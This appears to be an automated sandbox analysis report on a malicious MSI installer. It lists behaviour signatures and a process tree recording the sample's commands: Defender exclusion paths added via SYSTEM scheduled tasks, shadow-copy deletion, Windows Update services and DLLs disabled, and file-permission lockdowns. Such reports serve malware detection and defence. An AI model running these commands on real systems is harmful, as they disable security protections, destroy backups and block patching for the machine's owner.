Analysis

  • max time kernel
    139s
  • max time network
    150s
  • platform
    windows11-ltsc_2024_x64
  • resource
    win11ltsc2024-20260709-en
  • resource tags

    arch:x64arch:x86image:win11ltsc2024-20260709-enlocale:en-usos:windows11-ltsc_2024-x64systemwindows
  • submitted
    29/07/2026, 02:53

General

  • Target
    Install_28n002.msi
  • Size 5.7MB
  • Sample260729-ddldhashle
  • SHA256 4fbd486a728a847fa6dd5515ec46f603a6a8624eb48e5ebed2516b0ed7690007
  • MD5 SHA1 SHA512 SSDEEP TLSH

Malware Config

Signatures

  • UAC bypass 3 TTPs 1 IoCs
  • Windows security bypass 2 TTPs 10 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Run Powershell and hide display window.

  • Drops file in Drivers directory 1 IoCs
  • Possible privilege escalation attempt 23 IoCs
  • Disables service(s) 3 TTPs
  • Executes dropped EXE 4 IoCs
  • Loads dropped DLL 5 IoCs
  • Modifies file permissions 1 TTPs 23 IoCs
  • Adds Run key to start application 2 TTPs 2 IoCs
  • Badlisted process makes network request 6 IoCs

    Network request originating from process or tool commonly abused by malware.

  • Enumerates connected drives 3 TTPs 46 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Indicator Removal: Clear Persistence 1 TTPs 10 IoCs

    Clear artifacts associated with previously established persistence like scheduletasks on a host.

  • Drops file in System32 directory 8 IoCs
  • Drops file in Program Files directory 18 IoCs
  • Drops file in Windows directory 13 IoCs
  • Launches sc.exe 8 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Installer Packages 2 TTPs 1 IoCs
  • Event Triggered Execution: Screensaver 1 TTPs 3 IoCs

    Screensavers are programs that execute after a configurable time of user inactivity and consist of Portable Executable (PE) files with a .scr file extension.

  • Executes a command shell one-liner 1 TTPs 29 IoCs

    Execution of a cmd.exe one-liner (/c "close" or /k "keep") is a common script/loader stage.

  • System Location Discovery: System Language Discovery 1 TTPs 8 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks SCSI registry key(s) 3 TTPs 5 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Modifies Control Panel 4 IoCs
  • Modifies data under HKEY_USERS 9 IoCs
  • Modifies registry class 22 IoCs
  • Runs net.exe
  • Scheduled Task/Job: Scheduled Task 1 TTPs 10 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: LoadsDriver 8 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of SetWindowsHookEx 3 IoCs
  • Suspicious use of WriteProcessMemory 34 IoCs
  • System policy modification 1 TTPs 1 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

Processes

  • C:\Windows\system32\msiexec.exe
    msiexec.exe /I C:\Users\Admin\AppData\Local\Temp\Install_28n002.msi
    1⤵
    • Enumerates connected drives
    • Event Triggered Execution: Installer Packages
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SetWindowsHookEx
    PID:1984
  • C:\Windows\system32\msiexec.exe
    C:\Windows\system32\msiexec.exe /V
    1⤵
    • Enumerates connected drives
    • Drops file in Windows directory
    • Modifies data under HKEY_USERS
    • Modifies registry class
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:4136
    • C:\Windows\system32\srtasks.exe
      C:\Windows\system32\srtasks.exe ExecuteScopeRestorePoint /WaitForRestorePoint:2
      2⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:3316
    • C:\Windows\System32\MsiExec.exe
      C:\Windows\System32\MsiExec.exe -Embedding CEA8EFF26FCFE5B98A3EA347AA6EC64E E Global\MSI0000
      2⤵
      • Loads dropped DLL
      • Badlisted process makes network request
      • Drops file in System32 directory
      • Modifies data under HKEY_USERS
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of SetWindowsHookEx
      PID:4772
  • C:\Windows\system32\vssvc.exe
    C:\Windows\system32\vssvc.exe
    1⤵
    • Checks SCSI registry key(s)
    • Suspicious use of AdjustPrivilegeToken
    PID:4768
  • C:\Users\Public\mbEes8\YDlelx.exe
    "C:\Users\Public\mbEes8\YDlelx.exe"
    1⤵
    • Executes dropped EXE
    • Loads dropped DLL
    • Adds Run key to start application
    • Drops file in System32 directory
    • Drops file in Program Files directory
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of WriteProcessMemory
    PID:2740
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath 'C:\ProgramData','C:\Users','C:\Program Files (x86)','C:\' -Force
      2⤵
      • Command and Scripting Interpreter: PowerShell
      PID:4620
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\Public\mbEes8\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
      2⤵
      • Indicator Removal: Clear Persistence
      • Suspicious use of WriteProcessMemory
      PID:5604
      • C:\Windows\system32\schtasks.exe
        SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\Public\mbEes8\" /t REG_DWORD /d 0 /f"
        3⤵
        • Scheduled Task/Job: Scheduled Task
        PID:4272
      • C:\Windows\system32\schtasks.exe
        SCHTASKS /Run /TN "Task1"
        3⤵
          PID:3416
        • C:\Windows\system32\schtasks.exe
          SCHTASKS /Delete /TN "Task1" /F
          3⤵
            PID:1848
        • C:\Windows\System32\cmd.exe
          "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
          2⤵
          • Indicator Removal: Clear Persistence
          • Suspicious use of WriteProcessMemory
          PID:5644
          • C:\Windows\system32\schtasks.exe
            SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f"
            3⤵
            • Scheduled Task/Job: Scheduled Task
            PID:868
          • C:\Windows\system32\schtasks.exe
            SCHTASKS /Run /TN "Task1"
            3⤵
              PID:5012
            • C:\Windows\system32\schtasks.exe
              SCHTASKS /Delete /TN "Task1" /F
              3⤵
                PID:3812
            • C:\Windows\System32\cmd.exe
              "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
              2⤵
              • Indicator Removal: Clear Persistence
              • Suspicious use of WriteProcessMemory
              PID:5144
              • C:\Windows\system32\schtasks.exe
                SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\" /t REG_DWORD /d 0 /f"
                3⤵
                • Scheduled Task/Job: Scheduled Task
                PID:6440
              • C:\Windows\system32\schtasks.exe
                SCHTASKS /Run /TN "Task1"
                3⤵
                  PID:3320
                • C:\Windows\system32\schtasks.exe
                  SCHTASKS /Delete /TN "Task1" /F
                  3⤵
                    PID:1900
                • C:\Windows\System32\cmd.exe
                  "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
                  2⤵
                  • Indicator Removal: Clear Persistence
                  • Suspicious use of WriteProcessMemory
                  PID:1068
                  • C:\Windows\system32\schtasks.exe
                    SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\" /t REG_DWORD /d 0 /f"
                    3⤵
                    • Scheduled Task/Job: Scheduled Task
                    PID:1764
                  • C:\Windows\system32\schtasks.exe
                    SCHTASKS /Run /TN "Task1"
                    3⤵
                      PID:3388
                    • C:\Windows\system32\schtasks.exe
                      SCHTASKS /Delete /TN "Task1" /F
                      3⤵
                        PID:4384
                    • C:\Windows\System32\cmd.exe
                      "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"%USERPROFILE%\Documents\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
                      2⤵
                      • Indicator Removal: Clear Persistence
                      • Suspicious use of WriteProcessMemory
                      PID:6016
                      • C:\Windows\system32\schtasks.exe
                        SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\Admin\Documents\" /t REG_DWORD /d 0 /f"
                        3⤵
                        • Scheduled Task/Job: Scheduled Task
                        PID:6828
                      • C:\Windows\system32\schtasks.exe
                        SCHTASKS /Run /TN "Task1"
                        3⤵
                          PID:2880
                        • C:\Windows\system32\schtasks.exe
                          SCHTASKS /Delete /TN "Task1" /F
                          3⤵
                            PID:6744
                        • C:\Program Files (x86)\ZNMzfs\FBSx6k.exe
                          "C:\Program Files (x86)\ZNMzfs\FBSx6k.exe"
                          2⤵
                          • UAC bypass
                          • Drops file in Drivers directory
                          • Executes dropped EXE
                          • Loads dropped DLL
                          • Adds Run key to start application
                          • Drops file in Program Files directory
                          • Event Triggered Execution: Screensaver
                          • System Location Discovery: System Language Discovery
                          • Modifies Control Panel
                          • Suspicious use of WriteProcessMemory
                          • System policy modification
                          PID:4224
                          • C:\Windows\SysWOW64\cmd.exe
                            cmd.exe /c vssadmin delete shadows /all /quiet
                            3⤵
                            • Executes a command shell one-liner
                            • System Location Discovery: System Language Discovery
                            PID:6276
                          • C:\Windows\SysWOW64\cmd.exe
                            cmd.exe /c icacls "C:\Program Files (x86)\ZNMzfs" /inheritance:r
                            3⤵
                            • Executes a command shell one-liner
                            • System Location Discovery: System Language Discovery
                            • Suspicious use of WriteProcessMemory
                            PID:3064
                            • C:\Windows\SysWOW64\icacls.exe
                              icacls "C:\Program Files (x86)\ZNMzfs" /inheritance:r
                              4⤵
                              • Possible privilege escalation attempt
                              • Modifies file permissions
                              • System Location Discovery: System Language Discovery
                              PID:5200
                          • C:\Windows\SysWOW64\cmd.exe
                            cmd /c echo.>c:\xxxx.ini
                            3⤵
                            • Executes a command shell one-liner
                            • System Location Discovery: System Language Discovery
                            PID:4972
                          • C:\Windows\SysWOW64\cmd.exe
                            cmd /c echo.>c:\xxxx.ini
                            3⤵
                            • Executes a command shell one-liner
                            • System Location Discovery: System Language Discovery
                            PID:1776
                          • C:\Windows\SysWOW64\cmd.exe
                            cmd.exe /c icacls "C:\Program Files (x86)\ZNMzfs" /grant:r Administrators:(OI)(CI)F /grant:r SYSTEM:(OI)(CI)F
                            3⤵
                            • Executes a command shell one-liner
                            PID:1912
                            • C:\Windows\SysWOW64\icacls.exe
                              icacls "C:\Program Files (x86)\ZNMzfs" /grant:r Administrators:(OI)(CI)F /grant:r SYSTEM:(OI)(CI)F
                              4⤵
                              • Possible privilege escalation attempt
                              • Modifies file permissions
                              PID:6456
                          • C:\Windows\SysWOW64\cmd.exe
                            "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\ZNMzfs\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
                            3⤵
                            • Indicator Removal: Clear Persistence
                            PID:4092
                            • C:\Windows\SysWOW64\schtasks.exe
                              SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\ZNMzfs\" /t REG_DWORD /d 0 /f"
                              4⤵
                              • Scheduled Task/Job: Scheduled Task
                              PID:4756
                            • C:\Windows\SysWOW64\schtasks.exe
                              SCHTASKS /Run /TN "Task1"
                              4⤵
                                PID:2828
                              • C:\Windows\SysWOW64\schtasks.exe
                                SCHTASKS /Delete /TN "Task1" /F
                                4⤵
                                  PID:5948
                              • C:\Windows\SysWOW64\cmd.exe
                                "C:\Windows\System32\cmd.exe" cmd.exe /q /c "@echo off & (for %i in (wuauserv UsoSvc uhssvc WaaSMedicSvc) do ( net stop %i >nul 2>&1 & sc config %i start= disabled >nul 2>&1 & sc failure %i reset= 0 actions= "" >nul 2>&1 )) & (for %i in (WaaSMedicSvc wuaueng) do ( takeown /f C:\Windows\System32\%i.dll >nul 2>&1 & icacls C:\Windows\System32\%i.dll /grant *S-1-1-0:F >nul 2>&1 & rename C:\Windows\System32\%i.dll %i_BAK.dll >nul 2>&1 & icacls C:\Windows\System32\%i_BAK.dll /setowner "NT SERVICE\TrustedInstaller" >nul 2>&1 & icacls C:\Windows\System32\%i_BAK.dll /remove *S-1-1-0 >nul 2>&1 )) & reg add "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /v Start /t REG_DWORD /d 4 /f >nul 2>&1 & reg add "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /v FailureActions /t REG_BINARY /d 000000000000000000000000030000001400000000000000c0d4010000000000e09304000000000000000000 /f >nul 2>&1 & reg add "HKLM\Software\Policies\Microsoft\Windows\WindowsUpdate\AU" /v NoAutoUpdate /t REG_DWORD /d 1 /f >nul 2>&1 & erase /f /s /q c:\windows\softwaredistribution\*.* >nul 2>&1 & rmdir /s /q c:\windows\softwaredistribution >nul 2>&1 & powershell -NoProfile -WindowStyle Hidden -Command "& {Get-ScheduledTask -TaskPath '\Microsoft\Windows\InstallService\*' | Disable-ScheduledTask -ErrorAction SilentlyContinue; Get-ScheduledTask -TaskPath '\Microsoft\Windows\UpdateOrchestrator\*' | Disable-ScheduledTask -ErrorAction SilentlyContinue; Get-ScheduledTask -TaskPath '\Microsoft\Windows\UpdateAssistant\*' | Disable-ScheduledTask -ErrorAction SilentlyContinue; Get-ScheduledTask -TaskPath '\Microsoft\Windows\WaaSMedic\*' | Disable-ScheduledTask -ErrorAction SilentlyContinue; Get-ScheduledTask -TaskPath '\Microsoft\Windows\WindowsUpdate\*' | Disable-ScheduledTask -ErrorAction SilentlyContinue; Get-ScheduledTask -TaskPath '\Microsoft\WindowsUpdate\*' | Disable-ScheduledTask -ErrorAction SilentlyContinue;}" >nul 2>&1"
                                3⤵
                                • Executes a command shell one-liner
                                PID:6580
                                • C:\Windows\SysWOW64\net.exe
                                  net stop wuauserv
                                  4⤵
                                    PID:6556
                                    • C:\Windows\SysWOW64\net1.exe
                                      C:\Windows\system32\net1 stop wuauserv
                                      5⤵
                                        PID:6524
                                    • C:\Windows\SysWOW64\sc.exe
                                      sc config wuauserv start= disabled
                                      4⤵
                                      • Launches sc.exe
                                      PID:6584
                                    • C:\Windows\SysWOW64\sc.exe
                                      sc failure wuauserv reset= 0 actions= ""
                                      4⤵
                                      • Launches sc.exe
                                      PID:3008
                                    • C:\Windows\SysWOW64\net.exe
                                      net stop UsoSvc
                                      4⤵
                                        PID:2604
                                        • C:\Windows\SysWOW64\net1.exe
                                          C:\Windows\system32\net1 stop UsoSvc
                                          5⤵
                                            PID:5308
                                        • C:\Windows\SysWOW64\sc.exe
                                          sc config UsoSvc start= disabled
                                          4⤵
                                          • Launches sc.exe
                                          PID:7144
                                        • C:\Windows\SysWOW64\sc.exe
                                          sc failure UsoSvc reset= 0 actions= ""
                                          4⤵
                                          • Launches sc.exe
                                          PID:4112
                                        • C:\Windows\SysWOW64\net.exe
                                          net stop uhssvc
                                          4⤵
                                            PID:3848
                                            • C:\Windows\SysWOW64\net1.exe
                                              C:\Windows\system32\net1 stop uhssvc
                                              5⤵
                                                PID:5972
                                            • C:\Windows\SysWOW64\sc.exe
                                              sc config uhssvc start= disabled
                                              4⤵
                                              • Launches sc.exe
                                              PID:236
                                            • C:\Windows\SysWOW64\sc.exe
                                              sc failure uhssvc reset= 0 actions= ""
                                              4⤵
                                              • Launches sc.exe
                                              PID:6844
                                            • C:\Windows\SysWOW64\net.exe
                                              net stop WaaSMedicSvc
                                              4⤵
                                                PID:3164
                                                • C:\Windows\SysWOW64\net1.exe
                                                  C:\Windows\system32\net1 stop WaaSMedicSvc
                                                  5⤵
                                                    PID:6448
                                                • C:\Windows\SysWOW64\sc.exe
                                                  sc config WaaSMedicSvc start= disabled
                                                  4⤵
                                                  • Launches sc.exe
                                                  PID:4428
                                                • C:\Windows\SysWOW64\sc.exe
                                                  sc failure WaaSMedicSvc reset= 0 actions= ""
                                                  4⤵
                                                  • Launches sc.exe
                                                  PID:3432
                                                • C:\Windows\SysWOW64\takeown.exe
                                                  takeown /f C:\Windows\System32\WaaSMedicSvc.dll
                                                  4⤵
                                                  • Possible privilege escalation attempt
                                                  • Modifies file permissions
                                                  PID:5800
                                                • C:\Windows\SysWOW64\icacls.exe
                                                  icacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F
                                                  4⤵
                                                  • Possible privilege escalation attempt
                                                  • Modifies file permissions
                                                  PID:2356
                                                • C:\Windows\SysWOW64\icacls.exe
                                                  icacls C:\Windows\System32\WaaSMedicSvc_BAK.dll /setowner "NT SERVICE\TrustedInstaller"
                                                  4⤵
                                                  • Possible privilege escalation attempt
                                                  • Modifies file permissions
                                                  PID:2964
                                                • C:\Windows\SysWOW64\icacls.exe
                                                  icacls C:\Windows\System32\WaaSMedicSvc_BAK.dll /remove *S-1-1-0
                                                  4⤵
                                                  • Possible privilege escalation attempt
                                                  • Modifies file permissions
                                                  PID:4116
                                                • C:\Windows\SysWOW64\takeown.exe
                                                  takeown /f C:\Windows\System32\wuaueng.dll
                                                  4⤵
                                                  • Possible privilege escalation attempt
                                                  • Modifies file permissions
                                                  PID:5928
                                                • C:\Windows\SysWOW64\icacls.exe
                                                  icacls C:\Windows\System32\wuaueng.dll /grant *S-1-1-0:F
                                                  4⤵
                                                  • Possible privilege escalation attempt
                                                  • Modifies file permissions
                                                  PID:2004
                                                • C:\Windows\SysWOW64\icacls.exe
                                                  icacls C:\Windows\System32\wuaueng_BAK.dll /setowner "NT SERVICE\TrustedInstaller"
                                                  4⤵
                                                  • Possible privilege escalation attempt
                                                  • Modifies file permissions
                                                  PID:5012
                                                • C:\Windows\SysWOW64\icacls.exe
                                                  icacls C:\Windows\System32\wuaueng_BAK.dll /remove *S-1-1-0
                                                  4⤵
                                                  • Possible privilege escalation attempt
                                                  • Modifies file permissions
                                                  PID:1492
                                                • C:\Windows\SysWOW64\reg.exe
                                                  reg add "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /v Start /t REG_DWORD /d 4 /f
                                                  4⤵
                                                    PID:6440
                                                  • C:\Windows\SysWOW64\reg.exe
                                                    reg add "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /v FailureActions /t REG_BINARY /d 000000000000000000000000030000001400000000000000c0d4010000000000e09304000000000000000000 /f
                                                    4⤵
                                                      PID:1952
                                                    • C:\Windows\SysWOW64\reg.exe
                                                      reg add "HKLM\Software\Policies\Microsoft\Windows\WindowsUpdate\AU" /v NoAutoUpdate /t REG_DWORD /d 1 /f
                                                      4⤵
                                                        PID:2924
                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                        powershell -NoProfile -WindowStyle Hidden -Command "& {Get-ScheduledTask -TaskPath '\Microsoft\Windows\InstallService\*' | Disable-ScheduledTask -ErrorAction SilentlyContinue; Get-ScheduledTask -TaskPath '\Microsoft\Windows\UpdateOrchestrator\*' | Disable-ScheduledTask -ErrorAction SilentlyContinue; Get-ScheduledTask -TaskPath '\Microsoft\Windows\UpdateAssistant\*' | Disable-ScheduledTask -ErrorAction SilentlyContinue; Get-ScheduledTask -TaskPath '\Microsoft\Windows\WaaSMedic\*' | Disable-ScheduledTask -ErrorAction SilentlyContinue; Get-ScheduledTask -TaskPath '\Microsoft\Windows\WindowsUpdate\*' | Disable-ScheduledTask -ErrorAction SilentlyContinue; Get-ScheduledTask -TaskPath '\Microsoft\WindowsUpdate\*' | Disable-ScheduledTask -ErrorAction SilentlyContinue;}"
                                                        4⤵
                                                        • Command and Scripting Interpreter: PowerShell
                                                        PID:5808
                                                    • C:\Windows\SysWOW64\cmd.exe
                                                      cmd.exe /c icacls "C:\Program Files (x86)\ZNMzfs" /grant:r Users:(OI)(CI)(RX) /deny Users:(OI)(CI)(DC)
                                                      3⤵
                                                      • Executes a command shell one-liner
                                                      PID:3296
                                                      • C:\Windows\SysWOW64\icacls.exe
                                                        icacls "C:\Program Files (x86)\ZNMzfs" /grant:r Users:(OI)(CI)(RX) /deny Users:(OI)(CI)(DC)
                                                        4⤵
                                                        • Possible privilege escalation attempt
                                                        • Modifies file permissions
                                                        PID:6056
                                                    • C:\Windows\SysWOW64\cmd.exe
                                                      cmd.exe /c icacls "C:\Program Files (x86)\ZNMzfs\FBSx6k.exe" /inheritance:r
                                                      3⤵
                                                      • Executes a command shell one-liner
                                                      PID:4964
                                                      • C:\Windows\SysWOW64\icacls.exe
                                                        icacls "C:\Program Files (x86)\ZNMzfs\FBSx6k.exe" /inheritance:r
                                                        4⤵
                                                        • Possible privilege escalation attempt
                                                        • Modifies file permissions
                                                        PID:916
                                                    • C:\Windows\SysWOW64\cmd.exe
                                                      "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
                                                      3⤵
                                                      • Indicator Removal: Clear Persistence
                                                      PID:4908
                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                        SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f"
                                                        4⤵
                                                        • Scheduled Task/Job: Scheduled Task
                                                        PID:3484
                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                        SCHTASKS /Run /TN "Task1"
                                                        4⤵
                                                          PID:4352
                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                          SCHTASKS /Delete /TN "Task1" /F
                                                          4⤵
                                                            PID:7020
                                                        • C:\Windows\SysWOW64\cmd.exe
                                                          cmd.exe /c icacls "C:\Program Files (x86)\ZNMzfs\FBSx6k.exe" /grant:r Administrators:(OI)(CI)F /grant:r SYSTEM:(OI)(CI)F
                                                          3⤵
                                                          • Executes a command shell one-liner
                                                          PID:3928
                                                          • C:\Windows\SysWOW64\icacls.exe
                                                            icacls "C:\Program Files (x86)\ZNMzfs\FBSx6k.exe" /grant:r Administrators:(OI)(CI)F /grant:r SYSTEM:(OI)(CI)F
                                                            4⤵
                                                            • Possible privilege escalation attempt
                                                            • Modifies file permissions
                                                            PID:4420
                                                        • C:\Windows\SysWOW64\cmd.exe
                                                          "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
                                                          3⤵
                                                          • Indicator Removal: Clear Persistence
                                                          PID:6444
                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                            SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\" /t REG_DWORD /d 0 /f"
                                                            4⤵
                                                            • Scheduled Task/Job: Scheduled Task
                                                            PID:3464
                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                            SCHTASKS /Run /TN "Task1"
                                                            4⤵
                                                              PID:4492
                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                              SCHTASKS /Delete /TN "Task1" /F
                                                              4⤵
                                                                PID:3192
                                                            • C:\Windows\SysWOW64\cmd.exe
                                                              cmd.exe /c icacls "C:\Program Files (x86)\ZNMzfs\FBSx6k.exe" /grant:r Users:(RX) /deny Users:(DE)
                                                              3⤵
                                                              • Executes a command shell one-liner
                                                              PID:6188
                                                              • C:\Windows\SysWOW64\icacls.exe
                                                                icacls "C:\Program Files (x86)\ZNMzfs\FBSx6k.exe" /grant:r Users:(RX) /deny Users:(DE)
                                                                4⤵
                                                                • Possible privilege escalation attempt
                                                                • Modifies file permissions
                                                                PID:3728
                                                            • C:\Windows\SysWOW64\cmd.exe
                                                              cmd.exe /c icacls "C:\Program Files (x86)\ZNMzfs\image.png" /inheritance:r
                                                              3⤵
                                                              • Executes a command shell one-liner
                                                              PID:1764
                                                              • C:\Windows\SysWOW64\icacls.exe
                                                                icacls "C:\Program Files (x86)\ZNMzfs\image.png" /inheritance:r
                                                                4⤵
                                                                • Possible privilege escalation attempt
                                                                • Modifies file permissions
                                                                PID:6640
                                                            • C:\Windows\SysWOW64\cmd.exe
                                                              cmd.exe /c icacls "C:\Program Files (x86)\ZNMzfs\image.png" /grant:r Administrators:(OI)(CI)F /grant:r SYSTEM:(OI)(CI)F
                                                              3⤵
                                                              • Executes a command shell one-liner
                                                              PID:2360
                                                              • C:\Windows\SysWOW64\icacls.exe
                                                                icacls "C:\Program Files (x86)\ZNMzfs\image.png" /grant:r Administrators:(OI)(CI)F /grant:r SYSTEM:(OI)(CI)F
                                                                4⤵
                                                                • Possible privilege escalation attempt
                                                                • Modifies file permissions
                                                                PID:6544
                                                            • C:\Windows\SysWOW64\cmd.exe
                                                              cmd.exe /c icacls "C:\Program Files (x86)\ZNMzfs\image.png" /grant:r Users:(RX) /deny Users:(DE)
                                                              3⤵
                                                              • Executes a command shell one-liner
                                                              PID:6860
                                                              • C:\Windows\SysWOW64\icacls.exe
                                                                icacls "C:\Program Files (x86)\ZNMzfs\image.png" /grant:r Users:(RX) /deny Users:(DE)
                                                                4⤵
                                                                • Possible privilege escalation attempt
                                                                • Modifies file permissions
                                                                PID:6528
                                                            • C:\Windows\SysWOW64\cmd.exe
                                                              "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
                                                              3⤵
                                                              • Indicator Removal: Clear Persistence
                                                              PID:6744
                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\" /t REG_DWORD /d 0 /f"
                                                                4⤵
                                                                • Scheduled Task/Job: Scheduled Task
                                                                PID:2732
